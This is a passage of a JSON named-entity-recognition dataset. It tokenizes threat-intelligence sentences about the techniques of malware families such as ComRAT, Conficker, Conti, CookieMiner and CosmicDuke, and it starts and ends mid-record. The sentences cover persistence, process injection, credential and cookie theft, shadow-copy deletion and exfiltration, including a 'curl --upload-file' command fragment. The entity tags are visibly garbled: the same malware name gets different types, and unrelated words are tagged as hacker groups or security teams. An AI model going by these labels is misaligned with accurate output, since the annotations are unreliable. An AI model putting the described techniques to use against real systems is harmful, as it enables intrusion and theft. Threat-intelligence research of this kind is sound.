"<code>HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32</code>." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "O", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ComRAT", "has", "used", "unique", "per", "machine", "passwords", "to", "decrypt", "the", "orchestrator", "payload", "and", "a", "hardcoded", "XOR", "key", "to", "decrypt", "its", "communications", "module.", "ComRAT", "has", "also", "used", "a", "unique", "password", "to", "decrypt", "the", "file", "used", "for", "its", "hidden", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "injected", "its", "orchestrator", "DLL", "into", "explorer.exe.", "ComRAT", "has", "also", "injected", "its", "communications", "module", "into", "the", "victim's", "default", "browser", "to", "make", "C2", "connections", "appear", "less", "suspicious", "as", "all", "network", "connections", "will", "be", "initiated", "by", "the", "browser", "process." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "embedded", "a", "XOR", "encrypted", "communications", "module", "inside", "the", "orchestrator", "module." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "stored", "encrypted", "orchestrator", "code", "and", "payloads", "in", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "a", "portable", "FAT16", "partition", "image", "placed", "in", "%TEMP%", "as", "a", "hidden", "file", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "can", "use", "email", "attachments", "for", "command", "and", "control." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "a", "task", "name", "associated", "with", "Windows", "SQM", "Consolidator." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "ComRAT", "has", "modified", "Registry", "values", "to", "store", "encrypted", "orchestrator", "code", "and", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "can", "load", "a", "PE", "file", "from", "memory", "or", "the", "file", "system", "and", "execute", "it", "with", "<code>CreateProcessW</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ComRAT", "has", "encrypted", "its", "virtual", "file", "system", "using", "AES-256", "in", "XTS", "mode." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "PowerShell", "to", "load", "itself", "every", "time", "a", "user", "logs", "in", "to", "the", "system.", "ComRAT", "can", "execute", "PowerShell", "scripts", "loaded", "into", "memory", "or", "from", "the", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "can", "check", "the", "default", "browser", "by", "querying", "<code>HKCR\\http\\shell\\open\\command</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ComRAT", "has", "used", "a", "scheduled", "task", "to", "launch", "its", "PowerShell", "loader." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ComRAT", "has", "been", "programmed", "to", "sleep", "outside", "local", "business", "hours", "(9", "to", "5,", "Monday", "to", "Friday)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "can", "check", "the", "victim's", "default", "browser", "to", "determine", "which", "process", "to", "inject", "its", "communications", "module", "into." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "checked", "the", "victim", "system's", "date", "and", "time", "to", "perform", "tasks", "during", "business", "hours", "(9", "to", "5,", "Monday", "to", "Friday)." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "HTTP", "requests", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ComRAT", "has", "used", "<code>cmd.exe</code>", "to", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Comnie", "executes", "a", "batch", "script", "to", "store", "discovery", "information", "in", "%TEMP%\\info.dat", "and", "then", "uploads", "the", "temporarily", "file", "to", "the", "remote", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "blogs", "and", "third-party", "sites", "(GitHub,", "tumbler,", "and", "BlogSpot)", "to", "avoid", "DNS-based", "blocking", "of", "their", "communication", "to", "the", "command", "and", "control", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "appends", "a", "total", "of", "64MB", "of", "garbage", "data", "to", "a", "file", "to", "deter", "any", "security", "products", "in", "place", "that", "may", "be", "scanning", "files", "on", "disk." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "the", "<code>net", "user</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "RC4", "and", "Base64", "to", "obfuscate", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "the", "<code>tasklist</code>", "to", "view", "running", "processes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "achieves", "persistence", "by", "adding", "a", "shortcut", "of", "itself", "to", "the", "startup", "path", "in", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "runs", "the", "<code>net", "view</code>", "command" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "Rundll32", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "attempts", "to", "detect", "several", "anti-virus", "products." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "establishes", "persistence", "via", "a", ".lnk", "file", "in", "the", "victim’s", "startup", "path." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "encrypts", "command", "and", "control", "communications", "with", "RC4." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "collects", "the", "hostname", "of", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "<code>ipconfig", "/all</code>", "and", "<code>route", "PRINT</code>", "to", "identify", "network", "adapter", "and", "interface", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "executes", "the", "<code>netstat", "-ano</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "runs", "the", "command:", "<code>net", "start", ">>", "%TEMP%\\info.dat</code>", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Comnie", "executes", "VBS", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "Comnie", "uses", "HTTP", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Comnie", "executes", "BAT", "scripts." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Conficker", "terminates", "various", "services", "related", "to", "system", "security", "and", "Windows." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "has", "used", "a", "DGA", "that", "seeds", "with", "the", "current", "UTC", "victim", "system", "date", "to", "generate", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "exploited", "the", "MS08-067", "Windows", "vulnerability", "for", "remote", "code", "execution", "through", "a", "crafted", "RPC", "request." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "B-Exp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "downloads", "an", "HTTP", "server", "to", "the", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "resets", "system", "restore", "points", "and", "deletes", "backup", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "B-HackOrg", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Conficker", "adds", "keys", "to", "the", "Registry", "at", "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>", "and", "various", "other", "Registry", "locations." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "scans", "for", "other", "machines", "to", "infect." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "has", "obfuscated", "its", "code", "to", "prevent", "its", "removal", "from", "host", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "adds", "Registry", "Run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "variants", "used", "the", "Windows", "AUTORUN", "feature", "to", "spread", "through", "USB", "propagation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Conficker", "variants", "spread", "through", "NetBIOS", "share", "propagation." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "uses", "the", "current", "UTC", "victim", "system", "date", "for", "domain", "generation", "and", "connects", "to", "time", "servers", "to", "determine", "the", "current", "date." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conficker", "copies", "itself", "into", "the", "<code>%systemroot%\\system32</code>", "directory", "and", "registers", "as", "a", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ConnectWise", "can", "be", "used", "to", "execute", "PowerShell", "commands", "on", "target", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ConnectWise", "can", "take", "screenshots", "on", "remote", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "ConnectWise", "can", "record", "video", "on", "remote", "hosts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "use", "<code>CreateIoCompletionPort()</code>,", "<code>PostQueuedCompletionStatus()</code>,", "and", "<code>GetQueuedCompletionPort()</code>", "to", "rapidly", "encrypt", "files,", "excluding", "those", "with", "the", "extensions", "of", ".exe,", ".dll,", "and", ".lnk.", "It", "has", "used", "a", "different", "AES-256", "encryption", "key", "per", "file", "with", "a", "bundled", "RAS-4096", "public", "encryption", "key", "that", "is", "unique", "for", "each", "victim.", "Conti", "can", "use", "“Windows", "Restart", "Manager”", "to", "ensure", "files", "are", "unlocked", "and", "open", "for", "encryption." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "has", "decrypted", "its", "payload", "using", "a", "hardcoded", "AES-256", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Conti", "has", "loaded", "an", "encrypted", "DLL", "into", "memory", "and", "then", "executes", "it." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "discover", "files", "on", "a", "local", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "delete", "Windows", "Volume", "Shadow", "Copies", "using", "<code>vssadmin</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "has", "used", "API", "calls", "during", "execution." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "enumerate", "remote", "open", "SMB", "network", "shares", "using", "<code>NetShareEnum()</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "use", "compiler-based", "obfuscation", "for", "its", "code,", "encrypt", "DLLs,", "and", "hide", "Windows", "API", "calls." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "B-Tool", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "enumerate", "through", "all", "open", "processes", "to", "search", "for", "any", "that", "have", "the", "string", "“sql”", "in", "their", "process", "name." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "has", "the", "ability", "to", "discover", "hosts", "on", "a", "target", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "spread", "via", "SMB", "and", "encrypts", "files", "on", "different", "hosts,", "potentially", "compromising", "an", "entire", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "stop", "up", "to", "146", "Windows", "services", "related", "to", "security,", "backup,", "database,", "and", "email", "solutions", "through", "the", "use", "of", "<code>net", "stop</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "B-Idus", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "retrieve", "the", "ARP", "cache", "from", "the", "local", "system", "by", "using", "the", "<code>GetIpNetTable()</code>", "API", "call", "and", "check", "to", "ensure", "IP", "addresses", "it", "connects", "to", "are", "for", "local,", "non-Internet,", "systems." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "enumerate", "routine", "network", "connections", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Conti", "can", "spread", "itself", "by", "infecting", "other", "remote", "machines", "via", "network", "shared", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Conti", "can", "utilize", "command", "line", "options", "to", "allow", "an", "attacker", "control", "over", "how", "it", "scans", "and", "encrypts", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "CookieMiner", "has", "used", "base64", "encoding", "to", "obfuscate", "scripts", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "can", "steal", "saved", "usernames", "and", "passwords", "in", "Chrome", "as", "well", "as", "credit", "card", "credentials." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "CookieMiner", "has", "retrieved", "iPhone", "text", "messages", "from", "iTunes", "phone", "backup", "files." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "used", "Google", "Chrome's", "decryption", "and", "extraction", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "checked", "for", "the", "presence", "of", "\"Little", "Snitch\",", "macOS", "network", "monitoring", "and", "application", "firewall", "software,", "stopping", "and", "exiting", "if", "it", "is", "found." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "used", "the", "<code>curl", "--upload-file</code>", "command", "to", "exfiltrate", "data", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CookieMiner", "has", "looked", "for", "files", "in", "the", "user's", "home", "directory", "with", "\"wallet\"", "in", "their", "name", "using", "<code>find</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "can", "download", "additional", "scripts", "from", "a", "web", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "installed", "multiple", "new", "Launch", "Agents", "in", "order", "to", "maintain", "persistence", "for", "cryptocurrency", "mining", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "used", "python", "scripts", "on", "the", "user’s", "system,", "as", "well", "as", "the", "Python", "variant", "of", "the", "Empire", "agent,", "EmPyre." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CookieMiner", "has", "loaded", "coinmining", "software", "onto", "systems", "to", "mine", "for", "Koto", "cryptocurrency." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "CookieMiner", "has", "checked", "for", "the", "presence", "of", "\"Little", "Snitch\",", "macOS", "network", "monitoring", "and", "application", "firewall", "software,", "stopping", "and", "exiting", "if", "it", "is", "found." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "can", "steal", "Google", "Chrome", "and", "Apple", "Safari", "browser", "cookies", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CookieMiner", "has", "used", "a", "Unix", "shell", "script", "to", "run", "a", "series", "of", "commands", "targeting", "macOS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "exfiltrates", "collected", "files", "automatically", "over", "FTP", "to", "remote", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "copies", "and", "exfiltrates", "the", "clipboard", "contents", "every", "30", "seconds." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "B-HackOrg", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "collects", "user", "credentials,", "including", "passwords,", "for", "various", "programs", "including", "popular", "instant", "messaging", "applications", "and", "email", "clients", "as", "well", "as", "WLAN", "keys." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Tool", "B-HackOrg", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "CosmicDuke", "collects", "user", "credentials,", "including", "passwords,", "for", "various", "programs", "including", "Web", "browsers." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "CosmicDuke", "steals", "user", "files", "from", "local", "hard", "drives", "with", "file", "extensions", "that", "match", "a", "predefined", "list." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "steals", "user", "files", "from", "network", "shared", "drives", "with", "file", "extensions", "and", "keywords", "that", "match", "a", "predefined", "list." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "steals", "user", "files", "from", "removable", "media", "with", "file", "extensions", "and", "keywords", "that", "match", "a", "predefined", "list." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "exfiltrates", "collected", "files", "over", "FTP", "or", "WebDAV.", "Exfiltration", "servers", "can", "be", "separately", "configured", "from", "C2", "servers." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "attempts", "to", "exploit", "privilege", "escalation", "vulnerabilities", "CVE-2010-0232", "or", "CVE-2010-4398." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "CosmicDuke", "searches", "attached", "and", "mounted", "drives", "for", "file", "extensions", "and", "keywords", "that", "match", "a", "predefined", "list." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "uses", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "CosmicDuke", "collects", "LSA", "secrets." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "searches", "for", "Microsoft", "Outlook", "data", "files", "with", "extensions", ".pst", "and", ".ost", "for", "collection", "and", "exfiltration." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "CosmicDuke", "uses", "scheduled", "tasks", "typically", "named", "\"Watchmon", "Service\"", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "CosmicDuke", "takes", "periodic", "screenshots", "and", "exfiltrates", "them." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "CosmicDuke", "collects", "Windows", "account", "hashes." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "CosmicDuke", "contains", "a", "custom", "version", "of", "the", "RC4", "algorithm", "that", "includes", "a", "programming", "error." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "can", "use", "HTTP", "or", "HTTPS", "for", "command", "and", "control", "to", "hard-coded", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CosmicDuke", "uses", "Windows", "services", "typically", "named", "\"javamtsup\"", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "CostaBricks", "has", "added", "the", "entire", "unobfuscated", "code", "of", "the", "legitimate", "open", "source", "application", "Blink", "to", "its", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CostaBricks", "has", "the", "ability", "to", "use", "bytecode", "to", "decrypt", "embedded", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "CostaBricks", "has", "been", "used", "to", "load", "SombRAT", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CostaBricks", "has", "used", "a", "number", "of", "API", "calls,", "including", "`VirtualAlloc`,", "`VirtualFree`,", "`LoadLibraryA`,", "`GetProcAddress`,", "and", "`ExitProcess`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "CostaBricks", "can", "inject", "a", "payload", "into", "the", "memory", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CostaBricks", "can", "implement", "a", "custom-built", "virtual", "machine", "mechanism", "to", "obfuscate", "its", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CozyCar", "uses", "Twitter", "as", "a", "backup", "C2", "channel", "to", "Twitter", "accounts", "specified", "in", "its", "configuration", "file." ], "ner_tags": [ "B-Idus", "O", "B-Org", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "payload", "of", "CozyCar", "is", "encrypted", "with", "simple", "XOR", "with", "a", "rotating", "key.", "The", "CozyCar", "configuration", "file", "has", "been", "encrypted", "with", "RC4", "keys." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CozyCar", "has", "executed", "Mimikatz", "to", "harvest", "stored", "credentials", "from", "the", "victim", "and", "further", "victim", "penetration." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "persistence", "mechanism", "used", "by", "CozyCar", "is", "to", "set", "itself", "to", "be", "executed", "at", "system", "startup", "by", "adding", "a", "Registry", "value", 